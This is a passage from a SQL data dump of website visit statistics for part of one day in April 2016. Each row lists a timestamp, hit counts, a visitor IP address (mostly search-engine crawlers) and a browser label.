9.85',''),(30779,1459526679,1,1,0,0,'82.145.208.175','opera'),(30780,1459526797,5,1,4,0,'66.249.69.77',''),(30781,1459526863,1,1,0,0,'91.196.178.37','chrome'),(30782,1459526866,2,1,1,0,'66.249.69.85',''),(30783,1459526902,1,1,0,0,'40.77.167.35','other'),(30784,1459527009,1,1,0,0,'217.69.133.226','other'),(30786,1459527323,1,1,0,0,'217.69.133.85','other'),(30787,1459527324,1,1,0,0,'217.69.133.84','other'),(30788,1459527567,1,1,0,0,'141.8.132.105','other'),(30789,1459527581,1,1,0,0,'151.80.31.159','other'),(30790,1459527665,3,1,2,0,'66.249.69.77',''),(30791,1459527966,1,1,0,0,'217.69.133.220','other'),(30792,1459528057,1,0,1,0,'66.249.69.85',''),(30793,1459528080,1,1,0,0,'66.249.69.93','other'),(30794,1459528170,1,1,0,0,'207.46.13.94','other'),(30795,1459528210,1,1,0,0,'178.154.189.202','other'),(30796,1459528214,1,1,0,0,'178.154.189.203','other'),(30797,1459528333,2,0,2,0,'68.180.231.29',''),(30798,1459528482,1,1,0,0,'91.196.178.167','chrome'),(30799,1459528625,1,1,0,0,'217.69.133.225','other'),(30800,1459528701,1,1,0,0,'91.196.178.36','chrome'),(30801,1459528729,5,1,4,0,'66.249.69.85',''),(30802,1459528922,266,266,0,0,'69.30.201.98','other'),(30803,1459528968,1,0,1,0,'68.180.229.103',''),(30804,1459529069,1,0,1,0,'66.249.69.162',''),(30805,1459529208,1,0,1,0,'66.249.69.93',''),(30806,1459529314,7,0,7,0,'66.249.69.77',''),(30807,1459529379,1,1,0,0,'141.8.183.25','other'),(30808,1459529384,1,1,0,0,'141.8.132.105','other'),(30809,1459529408,2,2,0,0,'69.30.214.46','other'),(30810,1459529482,1,1,0,0,'66.249.91.41','other'),(30811,1459529910,1,1,0,0,'178.94.172.27','chrome'),(30812,1459529921,1,1,0,0,'217.69.133.237','other'),(30813,1459530048,3,3,0,0,'159.203.75.59','other'),(30814,1459530119,1,1,0,0,'91.196.178.35','firefox'),(30815,1459530152,1,1,0,0,'40.77.167.35','other'),(30816,1459530300,1,1,0,0,'8.29.198.26','other'),(30817,1459530364,1,1,0,0,'164.132.161.43','other'),(30818,1459530822,1,1,0,0,'217.69.136.210','other'),(30819,1459531022,1,1,0,0,'217.69.133.85','other'),(30820,1459531080,2,2,0,0,'91.196.178.35','firefox'),(30821,1459531131,1,1,0,0,'141.8.132.105','other'),(30822,1459531142,1,1,0,0,'51.255.65.14','other'),(30823,1459531197,1,0,1,0,'68.180.231.29',''),(30824,1459531624,2,2,0,0,'5.255.253.113','other'),(30825,1459531730,1,1,0,0,'193.194.127.217','firefox'),(30826,1459531964,1,1,0,0,'176.193.101.249','chrome'),(30827,1459531965,1,1,0,0,'37.204.154.137','msie'),(30828,1459531966,1,1,0,0,'46.188.72.113','opera'),(30829,1459531967,1,1,0,0,'95.25.215.236','msie'),(30831,1459532058,1,0,1,0,'66.249.69.85',''),(30832,1459532091,1,1,0,0,'217.69.143.55','other'),(30833,1459532120,3,3,0,0,'130.193.50.34','other'),(30834,1459532124,1,1,0,0,'141.8.183.25','other'),(30835,1459532272,1,1,0,0,'207.46.13.94','other'),(30836,1459532419,1,1,0,0,'87.3.79.60','chrome'),(30837,1459532430,1,1,0,0,'157.55.39.82','other'),(30838,1459532776,1,1,0,0,'51.255.65.88','other'),(30839,1459532807,1,1,0,0,'93.72.13.0','other'),(30840,1459532843,1,1,0,0,'66.249.69.77','other'),(30841,1459533123,1,1,0,0,'217.69.136.205','other'),(30842,1459533131,1,1,0,0,'91.196.178.100','chrome'),(30843,1459533527,1,1,0,0,'217.69.133.221','other'),(30844,1459533544,1,1,0,0,'217.69.133.69','other'),(30845,1459533564,2,0,2,0,'66.249.69.93',''),(30846,1459533659,1,1,0,0,'91.196.178.37','chrome'),(30847,1459533937,1,0,1,0,'68.180.231.29',''),(30848,1459533967,2,0,2,0,'66.249.69.85',''),(30849,1459534081,1,1,0,0,'91.196.122.202','chrome'),(30850,1459534490,1,1,0,0,'91.196.178.67','chrome'),(30851,1459534669,5,0,5,0,'66.249.69.77',''),(30852,1459534688,4,1,3,0,'66.249.69.85',''),(30853,1459535283,1,1,0,0,'176.102.49.81','chrome'),(30854,1459535526,1,1,0,0,'91.196.178.67','chrome'),(30855,1459535848,1,1,0,0,'51.255.65.94','other'),(30856,1459536120,1,1,0,0,'66.249.69.150','other'),(30857,1459536189,5,1,4,0,'66.249.69.77',''),(30858,1459536281,1,1,0,0,'68.196.86.35','chrome'),(30859,1459536397,1,0,1,0,'68.180.231.29',''),(30860,1459536750,1,0,1,0,'66.249.69.93',''),(30861,1459536772,1,1,0,0,'37.147.76.126','chrome'),(30862,1459536902,1,1,0,0,'217.69.133.222','other'),(30863,1459537177,2,2,0,0,'66.249.69.93','other'),(30864,1459537250,1,1,0,0,'37.52.209.80','other'),(30865,1459537261,1,1,0,0,'68.64.168.162','other'),(30866,1459537269,1,0,1,0,'66.249.69.85',''),(30867,1459537305,1,1,0,0,'95.84.219.104','msie'),(30868,1459537307,1,1,0,0,'188.32.48.118','msie'),(30869,1459537316,1,1,0,0,'5.165.246.224','msie'),(30870,1459537335,2,0,2,0,'66.249.69.77',''),(30871,1459537613,2,2,0,0,'109.173.125.227','chrome'),(30872,1459538136,1,1,0,0,'91.196.178.166','chrome'),(30873,1459538228,2,2,0,0,'217.69.133.228','other'),(30874,1459538423,1,1,0,0,'217.69.133.222','other'),(30875,1459538441,1,1,0,0,'207.46.13.94','other'),(30876,1459538558,1,0,1,0,'68.180.231.29',''),(30877,1459538570,3,0,3,0,'66.249.69.77',''),(30878,1459538741,1,1,0,0,'168.235.205.205','other'),(30879,1459538767,1,1,0,0,'91.196.178.70','other'),(30880,1459538788,1,1,0,0,'37.54.115.28','chrome'),(30881,1459538918,1,0,1,0,'66.249.69.93',''),(30882,1459539007,1,0,1,0,'66.249.69.162',''),(30883,1459539210,1,0,1,0,'66.249.69.85',''),(30884,1459539339,1,1,0,0,'217.69.133.230','other'),(30885,1459539754,1,1,0,0,'217.69.133.222','other'),(30886,1459539839,2,0,2,0,'68.180.231.29',''),(30887,1459539956,1,0,1,0,'66.249.69.93',''),(30888,1459539972,1,1,0,0,'66.249.91.37','other'),(30889,1459540120,1,1,0,0,'51.255.65.32','other'),(30890,1459540171,1,0,1,0,'66.249.69.85',''),(30891,1459540287,1,1,0,0,'91.196.178.39','chrome'),(30892,1459540532,1,1,0,0,'62.210.215.100','chrome'),(30893,1459540540,3,3,0,0,'130.193.50.34','other'),(30894,1459540856,1,1,0,0,'77.52.109.192','chrome'),(30895,1459540970,1,1,0,0,'91.196.178.98','chrome'),(30896,1459541194,1,1,0,0,'8.29.198.25','other'),(30897,1459541378,3,0,3,0,'66.249.69.93',''),(30898,1459541665,3,0,3,0,'66.249.69.77',''),(30899,1459541728,1,1,0,0,'178.94.172.99','chrome'),(30900,1459541736,1,1,0,0,'157.55.39.82','other'),(30901,1459542213,1,1,0,0,'141.8.132.105','other'),(30902,1459542491,1,0,1,0,'68.180.231.29',''),(30903,1459542908,1,0,1,0,'66.249.69.77',''),(30904,1459543035,1,1,0,0,'68.196.86.35','chrome'),(30905,1459543197,1,1,0,0,'217.69.133.221','other'),(30906,1459543342,1,1,0,0,'217.69.136.206','other'),(30907,1459543385,1,1,0,0,'130.193.50.34','other'),(30908,1459543498,1,1,0,0,'151.80.31.161','other'),(30909,1459543849,1,1,0,0,'157.55.39.251','other'),(30910,1459543887,2,0,2,0,'66.249.69.77',''),(30911,1459544018,1,1,0,0,'217.69.133.84','other'),(30912,1459544053,2,2,0,0,'141.8.183.25','other'),(30913,1459544064,1,0,1,0,'66.249.69.93',''),(30914,1459544269,2,2,0,0,'46.211.115.36','other'),(30915,1459544330,1,1,0,0,'5.255.253.113','other'),(30916,1459544347,1,1,0,0,'151.80.31.172','other'),(30917,1459544648,1,0,1,0,'68.180.229.103',''),(30918,1459544738,1,1,0,0,'151.80.31.105','other'),(30919,1459544772,1,1,0,0,'217.69.133.227','other'),(30920,1459544887,1,0,1,0,'66.249.69.77',''),(30921,1459544916,3,0,3,0,'66.249.69.85',''),(30922,1459544935,1,1,0,0,'130.193.50.34','other'),(30923,1459545005,1,1,0,0,'66.249.69.156','other'),(30924,1459545084,4,0,4,0,'68.180.231.29',''),(30925,1459545091,1,1,0,0,'217.69.143.66','other'),(30927,1459545262,1,1,0,0,'217.69.133.231','other'),(30928,1459545528,2,2,0,0,'141.8.183.25','other'),(30929,1459545533,1,1,0,0,'141.8.132.105','other'),(30930,1459545537,1,1,0,0,'130.193.51.83','other'),(30931,1459545730,1,1,0,0,'51.255.65.10','other'),(30932,1459545852,1,1,0,0,'51.255.65.52','other'),(30933,1459545880,1,1,0,0,'91.196.178.35','chrome'),(30934,1459546122,1,1,0,0,'51.255.65.36','other'),(30935,1459546408,1,0,1,0,'66.249.69.77',''),(30936,1459546458,1,1,0,0,'141.8.132.105','other'),(30937,1459546462,1,1,0,0,'130.193.51.83','other'),(30938,1459546466,2,2,0,0,'130.193.50.34','other'),(30939,1459547146,2,0,2,0,'66.249.69.85',''),(30940,1459547435,1,1,0,0,'217.69.133.234','other'),(30941,1459547437,1,1,0,0,'217.69.133.70','other'),(30942,1459547438,1,1,0,0,'217.69.133.238','other'),(30943,1459547457,1,0,1,0,'66.249.69.156',''),(30944,1459547472,1,1,0,0,'66.249.69.162','other'),(30945,1459547475,1,1,0,0,'217.69.133.218','other'),(30946,1459547509,3,0,3,0,'66.249.69.93',''),(30947,1459547575,186,186,0,0,'51.254.97.192','other'),(30948,1459547680,1,1,0,0,'66.249.69.150','other'),(30949,1459547925,1,1,0,0,'130.193.51.83','other'),(30950,1459547929,2,2,0,0,'5.255.253.113','other'),(30951,1459548023,1,1,0,0,'217.69.133.84','other'),(30952,1459548024,2,2,0,0,'217.69.133.217','other'),(30953,1459548139,1,1,0,0,'217.69.133.220','other'),(30954,1459548559,1,0,1,0,'66.249.69.85',''),(30955,1459548674,1,0,1,0,'68.180.231.29',''),(30956,1459548899,1,1,0,0,'66.249.69.93','other'),(30957,1459549145,1,1,0,0,'217.69.133.215','other'),(30958,1459549146,1,1,0,0,'217.69.133.217','other'),(30959,1459549182,1,1,0,0,'130.193.51.83','other'),(30960,1459549429,2,0,2,0,'66.249.69.77',''),(30961,1459549668,1,0,1,0,'66.249.69.156',''),(30962,1459549828,1,1,0,0,'217.69.133.227','other'),(30963,1459549869,1,0,1,0,'66.249.69.93',''),(30964,1459549917,1,1,0,0,'141.8.132.105','other'),(30965,1459550004,1,1,0,0,'52.37.191.225','firefox'),(30966,1459550016,1,1,0,0,'209.91.174.132','firefox'),(30967,1459550085,1,1,0,0,'221.199.203.106','chrome'),(30968,1459550133,1,1,0,0,'52.76.48.246','chrome'),(30969,1459550227,1,0,1,0,'68.180.231.29',''),(30970,1459550251,1,1,0,0,'66.249.91.37','other'),(30971,1459550317,1,1,0,0,'217.69.133.84','other'),(30972,1459550670,1,1,0,0,'130.193.50.6','other'),(30973,1459550691,1,1,0,0,'217.69.133.69','other'),(30975,1459550848,1,1,0,0,'180.76.15.7','other'),(30976,1459551189,1,1,0,0,'193.201.227.144','chrome'),(30977,1459551297,1,1,0,0,'66.249.69.162','other'),(30978,1459551397,1,1,0,0,'141.8.183.25','other'),(30979,1459552029,1,1,0,0,'8.29.198.26','other'),(30980,1459552240,1,1,0,0,'5.255.253.113','other'),(30981,1459552480,1,1,0,0,'94.142.141.119','chrome'),(30982,1459552502,1,1,0,0,'217.69.133.220','other'),(30983,1459552745,1,1,0,0,'66.249.69.77','other'),(30984,1459553107,4,4,0,0,'130.193.50.34','other'),(30985,1459553549,1,1,0,0,'217.69.133.226','other'),(30986,1459553813,1,0,1,0,'66.249.69.93',''),(30987,1459553969,1,1,0,0,'141.8.132.105','other'),(30988,1459554070,2,0,2,0,'66.249.69.77',''),(30989,1459554195,1,1,0,0,'217.69.133.240','other'),(30990,1459554681,1,1,0,0,'217.69.133.230','other'),(30991,1459554874,1,1,0,0,'141.8.183.25','other'),(30992,1459554879,2,2,0,0,'141.8.132.105','other'),(30993,1459554883,1,1,0,0,'130.193.50.34','other'),(30994,1459555091,2,0,2,0,'66.249.69.77',''),(30995,1459555149,1,1,0,0,'37.204.154.137','msie'),(30996,1459555150,1,1,0,0,'37.112.226.216','opera'),(30997,1459555152,1,1,0,0,'176.195.114.198','chrome'),(30998,1459555153,1,1,0,0,'128.68.15.69','msie'),(30999,1459555154,1,1,0,0,'37.112.35.49','msie'),(31000,1459555424,2,0,2,0,'66.249.69.85',''),(31001,1459555450,1,0,1,0,'66.249.69.93',''),(31002,1459555482,1,1,0,0,'66.249.69.77','other'),(31003,1459555545,4,4,0,0,'178.154.189.202','other'),(31004,1459555588,1,1,0,0,'217.69.133.216','other'),(31005,1459556004,1,0,1,0,'66.249.69.150',''),(31006,1459556083,1,1,0,0,'217.69.133.227','other'),(31007,1459556315,1,0,1,0,'68.180.231.29',''),(31008,1459556349,4,4,0,0,'130.193.50.34','other'),(31009,1459556361,1,1,0,0,'141.8.132.105','other'),(31010,1459556366,2,2,0,0,'141.8.183.25','other'),(31011,1459556374,2,2,0,0,'5.255.253.113','other'),(31012,1459556410,1,1,0,0,'217.69.133.68','other'),(31013,1459556715,1,1,0,0,'217.69.133.229','other'),(31014,1459556762,1,0,1,0,'66.249.69.93',''),(31015,1459556883,1,1,0,0,'51.255.65.63','other'),(31016,1459556941,1,1,0,0,'217.69.133.5','other'),(31018,1459557073,1,0,1,0,'66.249.69.77',''),(31019,1459557684,1,1,0,0,'164.132.161.89','other'),(31020,1459557809,2,0,2,0,'66.249.69.93',''),(31021,1459557926,1,1,0,0,'66.249.69.150','other'),(31022,1459557957,1,1,0,0,'178.154.189.202','other'),(31023,1459558146,1,1,0,0,'130.193.51.83','other'),(31024,1459558150,1,1,0,0,'141.8.183.25','other'),(31025,1459558154,1,1,0,0,'5.255.253.113','other'),(31026,1459558391,1,0,1,0,'68.180.231.29',''),(31027,1459558507,1,1,0,0,'66.249.69.77','other'),(31028,1459558805,1,1,0,0,'217.69.133.235','other'),(31029,1459559066,2,1,1,0,'66.249.69.85',''),(31030,1459559387,2,2,0,0,'217.69.133.234','other'),(31031,1459559690,1,1,0,0,'217.69.133.219','other'),(31032,1459559872,2,2,0,0,'66.249.69.85','other'),(31033,1459560094,1,1,0,0,'178.154.149.10','other'),(31034,1459560289,1,0,1,0,'66.249.69.77',''),(31035,1459560524,1,1,0,0,'217.69.133.224','other'),(31036,1459560541,1,0,1,0,'66.249.69.93',''),(31037,1459560610,2,1,1,0,'66.249.69.77',''),(31038,1459560691,1,1,0,0,'180.76.15.141','other'),(31039,1459560757,1,1,0,0,'217.69.133.229','other'),(31040,1459561071,1,1,0,0,'66.249.91.37','other'),(31041,1459561160,1,1,0,0,'217.69.133.227','other'),(31042,1459561299,1,1,0,0,'180.76.15.20','other'),(31043,1459561634,1,1,0,0,'5.255.253.67','other'),(31044,1459561766,1,1,0,0,'217.69.133.67','other'),(31045,1459562057,2,2,0,0,'66.249.69.85','other'),(31046,1459562450,1,0,1,0,'68.180.229.103',''),(31047,1459562841,1,1,0,0,'8.29.198.26','other'),(31048,1459563345,1,1,0,0,'66.249.69.85','other'),(31049,1459563551,1,1,0,0,'66.249.69.93','other'),(31050,1459563803,1,0,1,0,'66.249.69.77',''),(31051,1459563871,1,1,0,0,'5.255.253.67','other'),(31052,1459563875,1,1,0,0,'130.193.50.34','other'),(31053,1459563879,1,1,0,0,'5.255.253.47','other'),(31054,1459563884,1,1,0,0,'141.8.183.25','other'),(31055,1459564010,1,1,0,0,'66.249.69.77','other'),(31056,1459564404,1,1,0,0,'217.69.133.67','other'),(31057,1459564465,1,0,1,0,'66.249.69.93',''),(31058,1459564499,1,1,0,0,'217.69.133.240','other'),(31059,1459564539,2,0,2,0,'68.180.231.29',''),(31060,1459564572,1,1,0,0,'217.69.133.222','other'),(31062,1459564573,1,1,0,0,'217.69.133.220','other'),(31064,1459564574,1,1,0,0,'217.69.133.224','other'),(31065,1459564655,2,2,0,0,'66.249.69.85','other'),(31066,1459564975,1,1,0,0,'217.69.133.236','other'),(31067,1459564977,1,1,0,0,'217.69.133.238','other'),(31068,1459565021,2,2,0,0,'66.249.69.93','other'),(31069,1459565113,1,1,0,0,'164.132.161.97','other'),(31070,1459565250,9,9,0,0,'66.249.69.77','other'),(31071,1459565564,3,2,1,0,'66.249.69.85',''),(31072,1459565565,1,1,0,0,'217.69.133.215','other'),(31073,1459565736,1,1,0,0,'164.132.161.17','other'),(31074,1459565922,6,6,0,0,'66.249.69.85','other'),(31075,1459566092,1,1,0,0,'176.77.21.226','msie'),(31076,1459566093,1,1,0,0,'95.84.219.104','msie'),(31077,1459566102,1,1,0,0,'128.68.2.14','msie'),(31078,1459566103,1,1,0,0,'5.165.242.52','msie'),(31079,1459566105,1,1,0,0,'178.140.238.139','msie'),(31080,1459566205,7,6,1,0,'66.249.69.77',''),(31081,1459566328,1,0,1,0,'66.249.69.156',''),(31082,1459566387,2,2,0,0,'141.8.183.19','other'),(31083,1459566391,1,1,0,0,'217.69.133.229','other'),(31084,1459566536,2,2,0,0,'66.249.69.77','other'),(31085,1459566558,4,3,1,0,'66.249.69.93',''),(31086,1459566823,1,0,1,0,'66.249.69.85',''),(31087,1459566843,3,3,0,0,'66.249.69.85','other'),(31088,1459567378,2,1,1,0,'66.249.69.93',''),(31089,1459567677,1,1,0,0,'66.249.69.162','other'),(31090,1459567733,1,1,0,0,'40.77.167.35','other'),(31091,1459567804,1,1,0,0,'47.88.148.43','firefox'),(31092,1459567944,1,0,1,0,'66.249.69.85',''),(31093,1459568313,1,0,1,0,'66.249.69.150',''),(31094,1459568515,1,0,1,0,'68.180.231.29',''),(31095,1459568687,49,49,0,0,'157.55.39.251','other'),(31096,1459568723,47,47,0,0,'207.46.13.94','other'),(31097,1459568746,62,62,0,0,'157.55.39.254','other'),(31098,1459569053,1,1,0,0,'51.255.65.44','other'),(31099,1459569345,1,1,0,0,'130.193.51.14','other'),(31100,1459569507,1,1,0,0,'83.143.240.10','chrome'),(31101,1459569533,1,1,0,0,'151.80.31.164','other'),(31102,1459569595,1,0,1,0,'66.249.69.93',''),(31103,1459570119,1,1,0,0,'217.69.143.71','other'),(31104,1459570128,1,1,0,0,'66.249.69.93','other'),(31105,1459570244,1,1,0,0,'217.69.133.218','other'),(31106,1459570830,1,0,1,0,'40.77.167.35',''),(31107,1459570866,2,0,2,0,'66.249.69.77',''),(31108,1459571289,1,1,0,0,'66.249.91.41','other'),(31109,1459571317,1,1,0,0,'217.69.133.228','other'),(31110,1459571318,1,1,0,0,'217.69.133.231','other'),(31111,1459571472,1,1,0,0,'217.69.133.221','other'),(31112,1459572320,2,1,1,0,'66.249.69.85',''),(31113,1459572355,1,1,0,0,'217.69.133.228','other'),(31114,1459572356,1,1,0,0,'217.69.133.233','other'),(31115,1459572492,1,0,1,0,'66.249.69.77',''),(31116,1459572571,4,1,3,0,'66.249.69.77',''),(31117,1459572579,1,1,0,0,'164.132.161.7','other'),(31118,1459572697,1,1,0,0,'157.55.39.65','other'),(31119,1459573441,1,1,0,0,'164.132.161.46','other'),(31120,1459573448,1,1,0,0,'217.69.133.223','other'),(31121,1459573662,1,1,0,0,'8.29.198.26','other'),(31122,1459573870,3,0,3,0,'68.180.231.29',''),(31123,1459574092,1,0,1,0,'68.180.229.103',''),(31124,1459574402,1,0,1,0,'66.249.69.77',''),(31125,1459574745,1,1,0,0,'217.69.133.221','other'),(31126,1459574838,3,0,3,0,'68.180.231.29',''),(31127,1459575006,1,1,0,0,'157.55.39.65','other'),(31128,1459575152,1,1,0,0,'164.132.161.45','other'),(31129,1459575489,1,1,0,0,'176.126.252.12','chrome'),(31130,1459575708,1,1,0,0,'217.69.143.63','other'),(31131,1459576030,1,1,0,0,'164.132.161.47','other'),(31132,1459576040,1,1,0,0,'217.69.133.237','other'),(31133,1459576041,1,1,0,0,'217.69.133.235','other'),(31134,1459576045,2,2,0,0,'66.249.69.150','other'),(31135,1459576111,1,1,0,0,'66.249.69.162','other'),(31136,1459576211,1,1,0,0,'217.69.133.85','other'),(31137,1459576744,1,1,0,0,'83.143.240.10','chrome'),(31138,1459576825,1,1,0,0,'157.55.39.254','other'),(31139,1459576888,1,0,1,0,'66.249.69.85',''),(31140,1459577079,2,2,0,0,'217.69.133.235','other'),(31141,1459577151,3,0,3,0,'68.180.231.29',''),(31142,1459577186,1,1,0,0,'130.193.37.21','other'),(31143,1459577190,1,1,0,0,'130.193.51.14','other'),(31144,1459577579,1,1,0,0,'217.69.133.85','other'),(31145,1459577773,1,1,0,0,'164.132.161.94','other'),(31146,1459577879,1,1,0,0,'217.69.133.227','other'),(31147,1459577995,1,0,1,0,'66.249.69.93',''),(31148,1459578269,1,1,0,0,'217.69.133.231','other'),(31149,1459578326,1,1,0,0,'217.69.133.224','other'),(31150,1459578367,1,1,0,0,'66.249.93.67','chrome'),(31151,1459579002,1,0,1,0,'66.249.69.93',''),(31152,1459579019,1,1,0,0,'157.55.39.254','other'),(31153,1459579026,2,0,2,0,'66.249.69.85',''),(31154,1459579066,1,1,0,0,'130.193.50.34','other'),(31155,1459579706,1,1,0,0,'130.193.51.19','other'),(31156,1459580179,2,0,2,0,'66.249.69.156',''),(31157,1459580474,1,1,0,0,'141.8.132.105','other'),(31158,1459580478,3,3,0,0,'130.193.50.34','other'),(31159,1459580731,1,0,1,0,'66.249.69.85',''),(31160,1459580848,1,1,0,0,'217.69.143.49','other'),(31161,1459580864,1,1,0,0,'141.8.142.67','other'),(31162,1459581320,1,1,0,0,'217.69.133.230','other'),(31163,1459581504,1,1,0,0,'66.249.91.45','other'),(31164,1459581544,1,1,0,0,'141.8.142.61','other'),(31165,1459581727,2,0,2,0,'66.249.69.77',''),(31166,1459581848,5,5,0,0,'130.193.50.34','other'),(31167,1459581946,1,1,0,0,'94.179.127.88','firefox'),(31168,1459581988,2,0,2,0,'68.180.231.29',''),(31169,1459582070,2,0,2,0,'66.249.69.93',''),(31170,1459582187,4,4,0,0,'141.8.132.105','other'),(31171,1459582198,2,2,0,0,'141.8.183.25','other'),(31172,1459582360,1,1,0,0,'217.69.133.218','other'),(31173,1459582632,1,1,0,0,'51.255.65.42','other'),(31174,1459582922,1,1,0,0,'40.77.167.35','other'),(31175,1459582924,1,1,0,0,'130.193.51.74','other'),(31176,1459582976,1,1,0,0,'217.69.133.221','other'),(31177,1459582977,1,1,0,0,'217.69.133.68','other'),(31178,1459583181,1,1,0,0,'217.69.136.206','other'),(31179,1459583615,86,86,0,0,'80.91.162.99','other'),(31180,1459583645,1,1,0,0,'5.255.253.53','other'),(31181,1459583689,1,1,0,0,'217.69.133.232','other'),(31182,1459583937,1,0,1,0,'66.249.69.85',''),(31183,1459584042,1,1,0,0,'164.132.161.94','other'),(31184,1459584043,1,1,0,0,'141.8.183.25','other'),(31185,1459584265,1,1,0,0,'217.69.133.84','other'),(31186,1459584345,1,1,0,0,'51.255.65.48','other'),(31187,1459584497,1,1,0,0,'8.29.198.25','other'),(31188,1459584630,1,1,0,0,'217.69.133.231','other'),(31189,1459584669,23,22,1,0,'66.249.69.77',''),(31190,1459584680,1,1,0,0,'66.249.69.85','other'),(31191,1459584681,1,1,0,0,'207.46.13.94','other'),(31192,1459584928,1,1,0,0,'157.55.39.254','other'),(31193,1459584965,1,0,1,0,'68.180.231.29',''),(31194,1459585147,14,14,0,0,'66.249.69.77','other'),(31195,1459585566,1,1,0,0,'141.8.142.58','other'),(31196,1459586214,1,1,0,0,'180.76.15.141','other'),(31197,1459586390,1,1,0,0,'207.46.13.94','other'),(31198,1459586812,1,1,0,0,'217.69.133.70','other'),(31199,1459586943,8,8,0,0,'141.8.132.105','other'),(31201,1459587665,6,6,0,0,'5.255.253.113','other'),(31202,1459587669,5,5,0,0,'141.8.183.25','other'),(31203,1459587678,18,18,0,0,'130.193.50.34','other'),(31204,1459587717,1,1,0,0,'5.255.253.68','other'),(31205,1459587722,2,2,0,0,'141.8.132.41','other'),(31206,1459587726,1,1,0,0,'141.8.142.61','other'),(31207,1459587730,1,1,0,0,'93.158.152.40','other'),(31208,1459587739,1,1,0,0,'178.154.149.10','other'),(31209,1459587783,1,1,0,0,'130.193.51.83','other'),(31210,1459587814,1,1,0,0,'130.193.51.19','other'),(31211,1459587949,1,1,0,0,'217.69.133.224','other'),(31212,1459587962,1,1,0,0,'91.196.178.68','chrome'),(31213,1459588253,1,1,0,0,'66.249.69.77','other'),(31214,1459588391,1,1,0,0,'213.227.217.146','chrome'),(31215,1459588709,1,1,0,0,'130.193.50.34','other'),(31216,1459588990,1,1,0,0,'51.255.65.32','other'),(31217,1459589027,1,1,0,0,'217.69.133.227','other'),(31218,1459589260,1,1,0,0,'217.69.133.84','other'),(31219,1459589489,1,1,0,0,'217.69.133.230','other'),(31220,1459589823,1,1,0,0,'151.80.31.165','other'),(31221,1459589830,1,1,0,0,'51.255.65.2','other'),(31222,1459589881,1,1,0,0,'130.193.50.34','other'),(31223,1459590175,1,1,0,0,'178.154.189.202','other'),(31224,1459590538,2,0,2,0,'66.249.69.93',''),(31225,1459590593,1,1,0,0,'213.179.252.181','firefox'),(31226,1459590783,4,0,4,0,'66.249.69.77',''),(31227,1459591026,3,0,3,0,'66.249.69.85',''),(31228,1459591811,1,0,1,0,'66.249.69.77',''),(31229,1459592148,1,1,0,0,'66.249.69.93','other'),(31230,1459592196,1,1,0,0,'130.193.50.34','other'),(31231,1459592281,1,0,1,0,'66.249.69.85',''),(31232,1459592492,1,1,0,0,'144.76.29.66','other'),(31233,1459592551,1,1,0,0,'66.249.91.45','other'),(31234,1459592649,1,1,0,0,'91.196.178.133','chrome'),(31235,1459592661,1,1,0,0,'109.162.125.127','firefox'),(31236,1459593052,1,1,0,0,'217.69.133.238','other'),(31237,1459593195,1,1,0,0,'217.69.133.203','other'),(31238,1459593196,1,1,0,0,'217.69.133.6','other'),(31239,1459593480,1,0,1,0,'66.249.69.156',''),(31240,1459593815,3,0,3,0,'66.249.69.77',''),(31241,1459593897,1,1,0,0,'217.69.133.225','other'),(31242,1459594135,1,1,0,0,'217.69.133.216','other'),(31243,1459594150,1,0,1,0,'66.249.69.93',''),(31244,1459594428,1,0,1,0,'66.249.69.85',''),(31245,1459594449,1,1,0,0,'217.69.136.210','other'),(31246,1459594784,2,2,0,0,'217.69.133.232','other'),(31247,1459595304,1,1,0,0,'8.29.198.26','other'),(31248,1459595399,1,1,0,0,'141.8.132.105','other'),(31249,1459595495,1,1,0,0,'69.30.218.202','other'),(31250,1459595778,1,0,1,0,'68.180.231.29',''),(31251,1459595854,1,1,0,0,'157.55.39.254','other'),(31252,1459596149,1,1,0,0,'91.196.178.65','chrome'),(31253,1459596235,2,0,2,0,'66.249.69.77',''),(31254,1459596357,1,1,0,0,'217.69.133.230','other'),(31255,1459596700,1,1,0,0,'46.4.123.172','other'),(31256,1459596901,1,1,0,0,'51.255.48.154','other'),(31257,1459597220,11,11,0,0,'130.193.50.34','other'),(31258,1459597722,5,5,0,0,'141.8.132.105','other'),(31259,1459597864,1,1,0,0,'217.69.133.217','other'),(31260,1459597865,1,1,0,0,'217.69.133.215','other'),(31261,1459597965,1,1,0,0,'207.46.13.94','other'),(31262,1459597970,1,1,0,0,'157.55.39.254','other'),(31263,1459598048,1,1,0,0,'217.69.133.3','other'),(31264,1459598049,1,1,0,0,'217.69.133.2','other'),(31265,1459598077,2,2,0,0,'40.77.167.35','other'),(31266,1459598105,1,1,0,0,'217.69.133.223','other'),(31267,1459598138,1,1,0,0,'217.69.143.65','other'),(31268,1459598254,2,2,0,0,'141.8.142.67','other'),(31269,1459598262,20,20,0,0,'130.193.50.34','other'),(31270,1459598331,1,1,0,0,'130.193.51.79','other'),(31271,1459598336,1,1,0,0,'5.255.253.67','other'),(31272,1459598340,1,1,0,0,'141.8.132.83','other'),(31273,1459598345,2,2,0,0,'141.8.183.19','other'),(31274,1459598349,1,1,0,0,'178.154.189.31','other'),(31275,1459598353,1,1,0,0,'130.193.51.19','other'),(31276,1459598358,1,1,0,0,'141.8.142.58','other'),(31277,1459598363,1,1,0,0,'93.158.152.51','other'),(31278,1459598376,1,1,0,0,'141.8.132.10','other'),(31279,1459598487,1,1,0,0,'5.9.111.70','other'),(31280,1459598612,1,1,0,0,'217.69.133.67','other'),(31281,1459598750,20,20,0,0,'130.193.51.83','other'),(31282,1459598809,1,1,0,0,'217.69.133.234','other'),(31283,1459598910,1,1,0,0,'180.76.15.145','other'),(31284,1459598974,23,23,0,0,'141.8.132.105','other'),(31285,1459598975,27,27,0,0,'141.8.183.25','other'),(31286,1459599084,22,22,0,0,'5.255.253.113','other'),(31287,1459599323,1,1,0,0,'178.154.189.202','other'),(31288,1459599367,1,0,1,0,'68.180.231.29',''),(31289,1459599398,2,0,2,0,'66.249.69.93',''),(31290,1459599427,1,1,0,0,'164.132.161.46','other'),(31291,1459599523,3,3,0,0,'5.9.87.111','other'),(31292,1459599530,21,21,0,0,'130.193.50.34','other'),(31293,1459599533,4,4,0,0,'130.193.51.19','other'),(31294,1459599598,2,0,2,0,'66.249.69.85',''),(31295,1459599834,1,1,0,0,'130.193.51.83','other'),(31296,1459600002,1,1,0,0,'193.111.140.153','other'),(31297,1459600110,1,1,0,0,'62.210.215.100','chrome'),(31298,1459600130,1,0,1,0,'66.249.64.228',''),(31299,1459600167,2,0,2,0,'66.249.64.233',''),(31300,1459600452,1,1,0,0,'207.46.13.94','other'),(31301,1459600693,1,1,0,0,'141.8.183.25','other'),(31302,1459601070,1,1,0,0,'217.69.133.85','other'),(31303,1459601285,1,0,1,0,'66.249.64.223',''),(31304,1459601500,